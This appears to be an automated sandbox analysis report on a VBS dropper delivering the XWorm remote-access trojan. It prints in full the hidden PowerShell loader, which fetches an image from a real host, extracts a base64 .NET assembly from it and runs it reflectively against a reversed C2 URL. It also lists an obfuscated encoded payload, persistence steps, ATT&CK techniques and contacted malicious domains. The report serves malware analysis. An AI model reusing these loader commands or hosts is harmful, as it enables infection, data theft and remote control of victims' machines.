Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'c:\programdata\' , 'name_file','regasm',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremqdgtrevdgtredudgtrendgtredgtreydgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtremwdgtre5dgtredqdgtreodgtredgtreydgtreddgtredgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtre	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'c:\programdata\' , 'name_file','regasm',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: RegAsm.exe, 00000007.00000002.3573731475.00000000065F2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3573731475.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3512863153.0000000001132000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3608, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
72625413524.vbs	11%	ReversingLabs	Script-WScript.Trojan.Heuristic

Source	Detection	Scanner	Label	Link
pantherropes.com	4%	Virustotal		Browse
uploaddeimagens.com.br	7%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	13%	Virustotal		Browse
https://lesferch.github.io/DesktopPic	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pantherropes.com	116.206.104.215	true	true	4%, Virustotal, Browse	unknown
aprilxrwonew8450.duckdns.org	134.255.217.251	true	true		unknown
paste.ee	172.67.187.200	true	false		high
uploaddeimagens.com.br	172.67.215.45	true	true	7%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pantherropes.com/error/xwapri.txt	true		unknown
aprilxrwonew8450.duckdns.org	true		unknown
https://paste.ee/d/FIwXa	false		high
https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820	true	13%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		low
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2921006320.000002209C8CE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/FIwXaU	wscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lesferch.github.io/DesktopPic	wscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
